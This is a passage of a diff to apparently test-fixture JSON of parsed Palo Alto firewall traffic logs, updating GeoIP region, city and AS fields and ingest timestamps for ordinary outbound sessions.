"region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "bytes": 523, - "ip": "175.16.199.1", - "packets": 5 + "packets": 5, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -4652,7 +4512,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031584700Z", + "ingested": "2021-12-14T14:51:01.287206515Z", "original": "Nov 30 16:09:39 PA-220 1,2018/11/30 16:09:38,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:38,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:38,24360,1,52506,443,47194,443,0x40001c,tcp,allow,1623,1100,523,13,2018/11/30 16:09:21,0,business-and-economy,0,32091139,0x0,192.168.0.0-192.168.255.255,United States,0,8,5,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:38.000-05:00", "timezone": "America/New_York", @@ -4680,26 +4540,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "bytes": 2428, - "ip": "175.16.199.1", - "packets": 4 + "packets": 4, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -4821,7 +4676,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031589100Z", + "ingested": "2021-12-14T14:51:01.287206846Z", "original": "Nov 30 16:09:39 PA-220 1,2018/11/30 16:09:38,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:38,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,quic,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:38,23952,1,60596,443,62921,443,0x400019,udp,allow,4405,1977,2428,9,2018/11/30 16:07:36,0,any,0,32091140,0x0,192.168.0.0-192.168.255.255,United States,0,5,4,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:38.000-05:00", "timezone": "America/New_York", @@ -4849,26 +4704,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 0, "bytes": 588, - "ip": "175.16.199.1", - "packets": 6 + "packets": 6, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -4981,7 +4831,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031592700Z", + "ingested": "2021-12-14T14:51:01.287207167Z", "original": "Nov 30 16:09:40 PA-220 1,2018/11/30 16:09:39,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:39,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:39,24328,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:25,0,any,0,32091141,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:39.000-05:00", "timezone": "America/New_York", @@ -5009,26 +4859,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 0, "bytes": 196, - "ip": "175.16.199.1", - "packets": 2 + "packets": 2, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -5141,7 +4986,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031597200Z", + "ingested": "2021-12-14T14:51:01.287207490Z", "original": "Nov 30 16:09:40 PA-220 1,2018/11/30 16:09:39,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:39,192.168.15.210,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:39,24385,2,0,0,0,0,0x500019,icmp,allow,392,196,196,4,2018/11/30 16:09:25,0,any,0,32091142,0x0,192.168.0.0-192.168.255.255,United States,0,2,2,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:39.000-05:00", "timezone": "America/New_York", @@ -5169,26 +5014,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "bytes": 5003, - "ip": "175.16.199.1", - "packets": 10 + "packets": 10, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -5310,7 +5150,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031602600Z", + "ingested": "2021-12-14T14:51:01.287207881Z", "original": "Nov 30 16:09:40 PA-220 1,2018/11/30 16:09:39,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:39,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:39,24172,1,52514,443,41958,443,0x40001c,tcp,allow,7231,2228,5003,22,2018/11/30 16:09:22,0,web-advertisements,0,32091143,0x0,192.168.0.0-192.168.255.255,United States,0,12,10,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:39.000-05:00", "timezone": "America/New_York", @@ -5338,26 +5178,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 171, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -5479,7 +5314,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031608400Z", + "ingested": "2021-12-14T14:51:01.287208202Z", "original": "Nov 30 16:09:41 PA-220 1,2018/11/30 16:09:40,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:40,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:40,24131,1,55155,53,51374,53,0x400019,udp,allow,267,96,171,2,2018/11/30 16:09:08,0,any,0,32091144,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:40.000-05:00", "timezone": "America/New_York", @@ -5507,26 +5342,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 4282, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -5648,7 +5478,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031613700Z", + "ingested": "2021-12-14T14:51:01.287208534Z", "original": "Nov 30 16:09:41 PA-220 1,2018/11/30 16:09:40,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:40,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:40,24393,1,52445,4282,25566,4282,0x400019,tcp,allow,78,78,0,1,2018/11/30 16:09:33,0,any,0,32091145,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:40.000-05:00", "timezone": "America/New_York", @@ -5676,26 +5506,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 17472, "bytes": 2316, - "ip": "175.16.199.1", - "packets": 9 + "packets": 9, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -5817,7 +5642,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031619300Z", + "ingested": "2021-12-14T14:51:01.287208972Z", "original": "Nov 30 16:09:43 PA-220 1,2018/11/30 16:09:42,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:42,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,tanium,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:42,24976,1,52516,17472,63757,17472,0x40005e,tcp,allow,3402,1086,2316,20,2018/11/30 16:09:25,0,any,0,32091146,0x0,192.168.0.0-192.168.255.255,United States,0,11,9,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:42.000-05:00", "timezone": "America/New_York", @@ -5845,26 +5670,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "bytes": 13966, - "ip": "175.16.199.1", - "packets": 19 + "packets": 19, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -5986,7 +5806,7 @@ }, "event": { "duration": 4000000000, - "ingested": "2021-12-09T13:44:05.031624700Z", + "ingested": "2021-12-14T14:51:01.287209366Z", "original": "Nov 30 16:09:43 PA-220 1,2018/11/30 16:09:42,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:42,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:42,24348,1,52511,443,3803,443,0x400053,tcp,allow,16594,2628,13966,38,2018/11/30 16:09:21,4,computer-and-internet-info,0,32091147,0x0,192.168.0.0-192.168.255.255,United States,0,19,19,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:42.000-05:00", "timezone": "America/New_York", @@ -6014,26 +5834,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 244, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -6155,7 +5970,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031630Z", + "ingested": "2021-12-14T14:51:01.287209719Z", "original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24046,1,3018,53,34994,53,0x400019,udp,allow,323,79,244,2,2018/11/30 16:09:12,0,any,0,32091148,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:45.000-05:00", "timezone": "America/New_York", @@ -6183,26 +5998,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 205, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -6324,7 +6134,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031635500Z", + "ingested": "2021-12-14T14:51:01.287210055Z", "original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24196,1,16569,53,38064,53,0x400019,udp,allow,300,95,205,2,2018/11/30 16:09:12,0,any,0,32091149,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:45.000-05:00", "timezone": "America/New_York", @@ -6352,26 +6162,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "bytes": 2302, - "ip": "175.16.199.1", - "packets": 20 + "packets": 20, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -6493,7 +6298,7 @@ }, "event": { "duration": 8000000000, - "ingested": "2021-12-09T13:44:05.031640800Z", + "ingested": "2021-12-14T14:51:01.287210432Z", "original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24264,1,52479,443,42924,443,0x400053,tcp,allow,6598,4296,2302,44,2018/11/30 16:09:19,8,insufficient-content,0,32091150,0x0,192.168.0.0-192.168.255.255,United States,0,24,20,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:45.000-05:00", "timezone": "America/New_York", @@ -6521,26 +6326,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "Asia Pacific Region", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "bytes": 6757, - "ip": "175.16.199.1", - "packets": 41 + "packets": 41, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -6662,7 +6462,7 @@ }, "event": { "duration": 8000000000, - "ingested": "2021-12-09T13:44:05.031646300Z", + "ingested": "2021-12-14T14:51:01.287210754Z", "original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24248,1,52478,443,58977,443,0x400053,tcp,allow,65588,58831,6757,104,2018/11/30 16:09:19,8,insufficient-content,0,32091151,0x0,192.168.0.0-192.168.255.255,Asia Pacific Region,0,63,41,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:45.000-05:00", "timezone": "America/New_York", @@ -6690,26 +6490,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "bytes": 9007, - "ip": "175.16.199.1", - "packets": 15 + "packets": 15, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -6831,7 +6626,7 @@ }, "event": { "duration": 6000000000, - "ingested": "2021-12-09T13:44:05.031651600Z", + "ingested": "2021-12-14T14:51:01.287211151Z", "original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24268,1,52502,443,64732,443,0x400053,tcp,allow,13076,4069,9007,32,2018/11/30 16:09:21,6,business-and-economy,0,32091152,0x0,192.168.0.0-192.168.255.255,United States,0,17,15,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:45.000-05:00", "timezone": "America/New_York", @@ -6859,26 +6654,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "bytes": 661, - "ip": "175.16.199.1", - "packets": 7 + "packets": 7, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -7000,7 +6790,7 @@ }, "event": { "duration": 13000000000, - "ingested": "2021-12-09T13:44:05.031657100Z", + "ingested": "2021-12-14T14:51:01.287211478Z", "original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24175,1,52458,443,58292,443,0x40001c,tcp,allow,1761,1100,661,15,2018/11/30 16:09:14,13,computer-and-internet-info,0,32091153,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:45.000-05:00", "timezone": "America/New_York", @@ -7028,26 +6818,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "bytes": 11136, - "ip": "175.16.199.1", - "packets": 16 + "packets": 16, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -7169,7 +6954,7 @@ }, "event": { "duration": 8000000000, - "ingested": "2021-12-09T13:44:05.031662500Z", + "ingested": "2021-12-14T14:51:01.287211813Z", "original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24312,1,52484,443,32209,443,0x400053,tcp,allow,14732,3596,11136,31,2018/11/30 16:09:19,8,computer-and-internet-info,0,32091154,0x0,192.168.0.0-192.168.255.255,United States,0,15,16,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:45.000-05:00", "timezone": "America/New_York", @@ -7197,26 +6982,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "bytes": 11136, - "ip": "175.16.199.1", - "packets": 16 + "packets": 16, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -7338,7 +7118,7 @@ }, "event": { "duration": 8000000000, - "ingested": "2021-12-09T13:44:05.031667800Z", + "ingested": "2021-12-14T14:51:01.287212132Z", "original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24164,1,52482,443,38822,443,0x400053,tcp,allow,14732,3596,11136,31,2018/11/30 16:09:19,8,computer-and-internet-info,0,32091155,0x0,192.168.0.0-192.168.255.255,United States,0,15,16,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:45.000-05:00", "timezone": "America/New_York", @@ -7366,26 +7146,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 182, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -7507,7 +7282,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031673100Z", + "ingested": "2021-12-14T14:51:01.287212474Z", "original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,untrust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24198,1,33769,53,16044,53,0x400019,udp,allow,266,84,182,2,2018/11/30 16:09:12,0,any,0,32091156,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:45.000-05:00", "timezone": "America/New_York", @@ -7535,26 +7310,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 90, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -7676,7 +7446,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:44:05.031678400Z", + "ingested": "2021-12-14T14:51:01.287212853Z", "original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,trust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24184,1,14106,53,56614,53,0x400019,udp,allow,164,74,90,2,2018/11/30 16:09:12,0,any,0,32091157,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:45.000-05:00", "timezone": "America/New_York", @@ -7704,26 +7474,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "bytes": 6669, - "ip": "175.16.199.1", - "packets": 13 + "packets": 13, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -7845,7 +7610,7 @@ }, "event": { "duration": 6000000000, - "ingested": "2021-12-09T13:44:05.031683900Z", + "ingested": "2021-12-14T14:51:01.287213170Z", "original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,untrust,trust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24314,1,52503,443,53168,443,0x400053,tcp,allow,9400,2731,6669,30,2018/11/30 16:09:21,6,business-and-economy,0,32091158,0x0,192.168.0.0-192.168.255.255,United States,0,17,13,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:45.000-05:00", "timezone": "America/New_York", @@ -7873,26 +7638,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "bytes": 661, - "ip": "175.16.199.1", - "packets": 7 + "packets": 7, + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -8014,7 +7774,7 @@ }, "event": { "duration": 13000000000, - "ingested": "2021-12-09T13:44:05.031689300Z", + "ingested": "2021-12-14T14:51:01.287213510Z", "original": "Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,xtrust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24204,1,52459,443,28012,443,0x40001c,tcp,allow,1761,1100,661,15,2018/11/30 16:09:14,13,computer-and-internet-info,0,32091159,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:45.000-05:00", "timezone": "America/New_York", @@ -8042,26 +7802,21 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "Asia Pacific Region", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, 